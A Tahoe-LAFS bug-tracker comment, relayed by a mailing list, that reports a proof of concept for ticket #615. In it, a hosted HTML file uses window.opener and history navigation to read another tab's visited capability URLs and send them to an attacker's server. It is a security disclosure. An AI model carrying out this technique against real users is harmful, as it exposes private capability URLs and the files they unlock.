[tahoe-lafs-trac-stream] [Tahoe-LAFS] #615: Can JavaScript loaded from Tahoe access all your content which is loaded from Tahoe?

Tahoe-LAFS trac at tahoe-lafs.org
Sun Apr 26 23:52:37 UTC 2015 

#615: Can JavaScript loaded from Tahoe access all your content which is loaded
from Tahoe?
-------------------------+-------------------------------------------------
     Reporter:  zooko    |      Owner:  davidsarah
         Type:  defect   |     Status:  assigned
     Priority:           |  Milestone:  soon
  critical               |    Version:  1.3.0
    Component:  code-    |   Keywords:  newcaps confidentiality integrity
  frontend-web           |  preservation capleak gsoc websec
   Resolution:           |
Launchpad Bug:           |
-------------------------+-------------------------------------------------

Comment (by TheJH):

 I made a PoC that shows one possible way to exploit this. Use a Tahoe-LAFS
 instance that is connected to the testnet, browse to different URLs in the
 testnet, then navigate the same tab to this URL:

 http://localhost:3456/file/URI%3ACHK%3A6hxsjrbtiyjohpj7i7bn6dqixi%3Ail3humxxej53gg6bpr3l5ecxrqdg6wnd5ceuq33vqtrivvrhlfeq%3A1%3A6%3A1262/@@named=/historysteal.html

 Click anywhere on the page. The following attack will happen:

 -------------------------
 The evil HTML file opens itself in a second tab using
 "window.open(location.toString(), 'foo')" (requires a click to bypass
 popup blockers). Then the evil HTML file in the second tab can
 access the first tab using "window.opener". The evil second tab does this
 again and again:

  - run window.parent.history.go(-1) to let the first tab go one step back
 in the browsing history
  - grab the current URL of the first tab using
 window.parent.location.toString()
  - send the URL out to the attacker's server

 This will work until a page with a different origin is reached.
 -------------------------

 After the attack has run, you'll see the URLs that you have visited in the
 same tab before.

 This is a copy of the HTML file:
 https://var.thejh.net/lafs_historysteal.html.bin

--
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/615#comment:29>
Tahoe-LAFS <https://Tahoe-LAFS.org>
secure decentralized storage

More information about the tahoe-lafs-trac-stream mailing list